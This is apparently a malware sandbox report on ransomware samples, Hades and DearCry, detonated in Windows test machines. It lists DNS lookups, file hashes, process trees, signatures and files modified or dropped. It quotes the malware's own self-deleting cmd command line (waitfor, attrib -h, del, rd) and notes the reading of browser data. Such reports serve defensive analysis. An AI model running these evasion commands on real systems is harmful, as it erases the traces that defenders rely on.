US 8.8.8.8:53 153.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 154.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 155.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 156.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 157.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 160.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 162.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 163.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 164.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 167.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 168.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 170.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 171.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 172.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 173.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 174.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 175.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 176.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 177.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 178.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 179.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 227.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 181.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 182.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 183.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 184.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 185.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 186.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 187.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 188.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 189.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 190.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 233.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 151.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 234.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 236.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 238.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 191.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 193.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 196.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 197.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 199.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 192.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 201.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 206.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 200.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 208.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 207.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 212.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 211.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 214.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 215.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 216.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 217.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 218.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 221.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 223.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 210.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 226.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 230.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 229.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 222.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 247.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 220.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 219.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 213.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 209.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 205.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 204.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 203.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 198.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 202.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 194.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 254.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 251.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 249.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 246.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 195.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 243.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 244.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 242.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 241.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 240.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 239.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 237.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 235.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 232.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 245.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 101.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 97.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 125.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 102.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 100.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 95.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 98.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 103.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 110.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 99.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 133.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 147.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 248.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 250.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 253.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 252.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 132.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 143.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 139.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 158.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 169.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 152.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 166.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 180.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 165.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 161.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 146.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 159.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 145.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 140.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 142.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 141.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 137.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 144.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 138.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 135.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 134.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 208.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 206.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 200.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 201.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 192.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 199.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 197.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 196.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 236.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 193.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 238.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 191.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 233.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 212.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 214.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 207.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 210.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 221.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 217.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 226.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 229.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 222.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 247.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 230.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 204.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 254.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 202.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 198.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 251.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 203.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 205.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 195.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 239.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 220.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 237.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 213.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 232.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 209.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 245.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 194.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 219.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 242.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 244.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 243.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 249.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 246.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 235.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 240.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 241.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 252.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 253.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 250.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 248.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

memory/3656-1-0x00007FF841003000-0x00007FF841005000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s4ckz4me.vlp.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3656-11-0x000002089FF90000-0x000002089FFB2000-memory.dmp

memory/3656-12-0x00007FF841000000-0x00007FF841AC1000-memory.dmp

memory/3656-13-0x00007FF841000000-0x00007FF841AC1000-memory.dmp

memory/3656-16-0x00007FF841000000-0x00007FF841AC1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 556084f2c6d459c116a69d6fedcc4105
SHA1 633e89b9a1e77942d822d14de6708430a3944dbc
SHA256 88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA512 0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 f58e73a5c43b0713d39bb6cca4251670
SHA1 ece141754053a0d3855b7270a9569601e99dbbf6
SHA256 f374315ca436a4f0505cdc56d043e1176df91064603a38001902cf596262d015
SHA512 1872b460e63288eabd785e10c76ee0b35bb9c37891193ad4ac0992e37f2fd6d9e692cea26ceec58b219b892910825e80d8e009c161d36735eb1dd839d4622ee8

C:\Users\Admin\README.5a727a6e.TXT

MD5 d4e176b40c4ea17f4870c34fad926d6e
SHA1 2cc3e4c6cf00e4a2ac0e16e9f7b0ccf2421b92e0
SHA256 7ee422c323ddbda59934ed7bfa6217cfe06bdb50165b7d4b6115475f1df7af0c
SHA512 feaa913ae99db210db088423a9813e1efedd89d80817bf485a4d9f8ea349b86932ac16ba0473bd224ff150603507bd289d01aebc1a702372a076a167b632f471

Analysis: behavioral26

Detonation Overview

Submitted

2024-07-07 14:07

Reported

2024-07-07 14:40

Platform

win10v2004-20240508-en

Max time kernel

1751s

Max time network

1764s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe"

Signatures

Hades Ransomware

ransomware hades

Hades payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

CryptOne packer

cryptone packer
Description Indicator Process Target
N/A N/A N/A N/A

Renames multiple (160) files with added filename extension

ransomware

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\DsDownload\Serv N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4864 wrote to memory of 2456 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe C:\Users\Admin\AppData\Roaming\DsDownload\Serv
PID 4864 wrote to memory of 2456 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe C:\Users\Admin\AppData\Roaming\DsDownload\Serv
PID 2456 wrote to memory of 4624 N/A C:\Users\Admin\AppData\Roaming\DsDownload\Serv C:\Windows\SYSTEM32\cmd.exe
PID 2456 wrote to memory of 4624 N/A C:\Users\Admin\AppData\Roaming\DsDownload\Serv C:\Windows\SYSTEM32\cmd.exe
PID 4864 wrote to memory of 1884 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe C:\Windows\SYSTEM32\cmd.exe
PID 4864 wrote to memory of 1884 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe C:\Windows\SYSTEM32\cmd.exe
PID 1884 wrote to memory of 3116 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\waitfor.exe
PID 1884 wrote to memory of 3116 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\waitfor.exe
PID 1884 wrote to memory of 2024 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\attrib.exe
PID 1884 wrote to memory of 2024 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\attrib.exe
PID 4624 wrote to memory of 4376 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\waitfor.exe
PID 4624 wrote to memory of 4376 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\waitfor.exe
PID 4624 wrote to memory of 4440 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\attrib.exe
PID 4624 wrote to memory of 4440 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\attrib.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe"

C:\Users\Admin\AppData\Roaming\DsDownload\Serv

C:\Users\Admin\AppData\Roaming\DsDownload\Serv /go

C:\Windows\SYSTEM32\cmd.exe

cmd /c waitfor /t 10 pause /d y & attrib -h "C:\Users\Admin\AppData\Roaming\DsDownload\Serv" & del "C:\Users\Admin\AppData\Roaming\DsDownload\Serv" & rd "C:\Users\Admin\AppData\Roaming\DsDownload\"

C:\Windows\SYSTEM32\cmd.exe

cmd /c waitfor /t 10 pause /d y & attrib -h "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe" & del "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe" & rd "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\"

C:\Windows\system32\waitfor.exe

waitfor /t 10 pause /d y

C:\Windows\system32\attrib.exe

attrib -h "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe"

C:\Windows\system32\waitfor.exe

waitfor /t 10 pause /d y

C:\Windows\system32\attrib.exe

attrib -h "C:\Users\Admin\AppData\Roaming\DsDownload\Serv"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

memory/4864-0-0x0000000002020000-0x00000000021E2000-memory.dmp

memory/4864-1-0x0000000140000000-0x00000001401E2000-memory.dmp

C:\Users\Admin\AppData\Roaming\DsDownload\Serv

MD5 9fa1ba3e7d6e32f240c790753cdaaf8e
SHA1 7bcea3fbfcb4c170c57c9050499e1fae40f5d731
SHA256 fe997a590a68d98f95ac0b6c994ba69c3b2ece9841277b7fecd9dfaa6f589a87
SHA512 8d2fb58cb8776ead15f445671431eae13a00b48921e545c7ecbf91829015d818d663d9369f181de669ebb771b113c2f675c3a156fac5ede019b5fad9cb8c65fe

memory/4864-8-0x0000000140000000-0x00000001401E2000-memory.dmp

memory/2456-10-0x0000000002080000-0x0000000002242000-memory.dmp

memory/2456-11-0x0000000140000000-0x00000001401E2000-memory.dmp

C:\Users\Admin\Desktop\HOW-TO-DECRYPT-gn9cj.txt

MD5 0c6d0a67b942d06fe27f41c7c582cdfe
SHA1 7e674cf6375b138cabca2706583d4ced7a1aef27
SHA256 014ea5effc97085b7832512b9ad2a5c4487265eb67e8d7b0920ef2bc8768400c
SHA512 53ec4509bc58f53419a8923d808c7dfdecf57dc203c37265d061aebab73147720d1c419e79578065a42c3b2a63504370f90516c3f0afad5d6997952592d3a39c

memory/2456-343-0x0000000002080000-0x0000000002242000-memory.dmp

memory/2456-342-0x0000000140000000-0x00000001401E2000-memory.dmp

memory/4864-345-0x0000000002020000-0x00000000021E2000-memory.dmp

memory/4864-344-0x0000000140000000-0x00000001401E2000-memory.dmp

Analysis: behavioral23

Detonation Overview

Submitted

2024-07-07 14:07

Reported

2024-07-07 14:39

Platform

win7-20240704-en

Max time kernel

1440s

Max time network

1449s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe"

Signatures

DearCry

ransomware dearcry

Renames multiple (3331) files with added filename extension

ransomware

Reads user/profile data of web browsers

spyware stealer

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\UGUBWRQR\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Microsoft Games\FreeCell\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\CGY9ZAGI\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\Searches\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Public\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files (x86)\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Tablet PC\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\OORJZY5Z\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\Favorites\Links for United States\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Public\Music\Sample Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\U42VY3XA\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\Contacts\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Public\Recorded TV\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Mahjong\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4NH6FMWO\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VUPQHL12\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\Favorites\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\Saved Games\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\Stationery\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Public\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\History\History.IE5\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Public\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Purble Place\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Ringtones\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Chess\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\TWVGEE8A\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Public\Pictures\Sample Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Hearts\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Microsoft Games\SpiderSolitaire\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
